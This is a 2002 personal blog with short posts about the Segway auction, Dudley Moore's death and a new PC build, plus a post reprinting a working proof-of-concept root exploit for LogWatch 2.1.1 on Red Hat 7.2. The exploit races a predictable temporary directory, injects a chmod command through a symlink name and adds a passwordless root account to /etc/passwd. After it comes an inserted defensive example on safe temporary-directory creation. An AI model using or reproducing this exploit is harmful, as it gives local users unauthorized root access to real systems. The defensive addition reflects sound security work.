Segway Auctions Close
Ok, you remember all that stupid hype about the damn Segway HT, the Human Transporter. Amazon held an auction for the first three units to be released to the public. The Segway is supposed to be sold at a date not so far away at a price of $3000. The three people who won their bids on the Amazon auction paid more than $100,000 each. Just makes me want to say "SUCKERS". It's a scooter, people! Not a flying car.

 

Logwatch is exploitable, watch out root!
While reading bugtraq, I found that Logwatch, which comes with the Red Hat 7.2 distros and is installed by default, is exploitable. LogWatch 2.1.1 is a part of the Red Hat Linux 7.2 distribution, enabled by default and run daily by the cron daemon. On a system running LogWatch, a local user is able to gain unauthorized root access, due to a race condition during the temporary directory creation. See below:

--- EXPLOIT ---


cat > logwatch211.sh <<'EOF'
#!/bin/bash
#
# March 27 2002
#
# logwatch211.sh
#
# Proof of concept exploit code
# for LogWatch 2.1.1
# Waits for LogWatch to be run then gives root shell
# For educational purposes only
#
# (c) Spybreak



SERVANT="00-logwatch" # Logwatch's cron entry
SCRIPTDIR=/etc/log.d/scripts/logfiles/samba/


echo
echo "LogWatch 2.1.1 root shell exploit"
echo '(c) Spybreak '
echo
echo "Waiting for LogWatch to be executed"

while :; do
    set `ps -o pid -C $SERVANT`
    if [ -n "$2" ]; then
        mkdir /tmp/logwatch.$2
        ln -s $SCRIPTDIR'`cd etc;chmod 666 passwd #`' /tmp/logwatch.$2/cron
        break;
    fi
done
echo "Waiting for LogWatch to finish it's work"
while :; do
    set `ps -o pid -C $SERVANT`
    if [ -z "$2" ]; then
        ls -l /etc/passwd|mail root
        echo master::0:0:master:/root:/bin/bash >> /etc/passwd
        break;
    fi
done
su master

EOF
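
The defensive side of this bug, as an added example that is not part of the original post or of Logwatch's own code: the proof of concept works because the working directory name /tmp/logwatch.<PID> is predictable and a directory that already exists gets trusted. The function names below are illustrative, and unsafe_tmpdir is a simplified stand-in for the flawed pattern, not Logwatch's actual source.

```shell
#!/bin/sh
# Added example: creating a private working directory without a race.

# Flawed pattern (simplified stand-in): guessable name, and a directory
# that somebody else already created is silently reused.
unsafe_tmpdir() {
    dir="${TMPDIR:-/tmp}/logwatch.$1"      # $1 = PID, visible to any user via ps
    mkdir -p "$dir" 2>/dev/null            # -p hides "File exists"
    printf '%s\n' "$dir"
}

# Preferred: mktemp -d picks an unpredictable name and creates the
# directory atomically with mode 0700.
safe_tmpdir() {
    mktemp -d "${TMPDIR:-/tmp}/logwatch.XXXXXXXXXX"
}

# If a fixed name is unavoidable: plain mkdir is atomic and fails when the
# name already exists (including as a symlink), so treat failure as fatal.
strict_tmpdir() {
    dir="${TMPDIR:-/tmp}/logwatch.$1"
    ( umask 077 && mkdir "$dir" ) 2>/dev/null || return 1
    printf '%s\n' "$dir"
}

# Audit check before trusting a directory: a real directory (not a symlink),
# owned by the current user, with no group/other permission bits.
is_private_dir() {
    [ -d "$1" ] && [ ! -L "$1" ] || return 1
    owner=$(ls -ldn "$1" | awk '{print $3}')
    [ "$owner" = "$(id -u)" ] || return 1
    perms=$(ls -ld "$1" | cut -c5-10)
    [ "$perms" = "------" ]
}

# Stand-alone demo: create, verify, clean up.
d=$(safe_tmpdir) && is_private_dir "$d" && echo "private dir: $d"
rmdir "$d"
```

A privileged job should abort when strict_tmpdir fails rather than fall back to the existing directory.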



 

A man we never got the chance to drink with
Dudley Moore died today at age 66. He died at his home in New Jersey of pneumonia. Dudley Moore was known for his great drunk acting in Arthur in 1981 and I have never stopped of being rich and drunk since that film. I will toast tonight hoping that he has a better round next time.

 

Random News....
Well, I have been kinda lazy this week. El_Jefe has left for Texas so the house is quiet for a while. He should be back in a couple of weeks, not sure if I will get any smarter while it is quiet at the Pickle Pad. I did get new parts for a new computer. I received an AMD Athlon XP 1900+ and a so-so motherboard with DDR. It's pretty sweet. I am going to crank it up to a little over 1.6GHz tonight. Another thing that got my attention today was that we got quite a few hits from FARK.com this week. I don't know what is linked but I found it interesting.
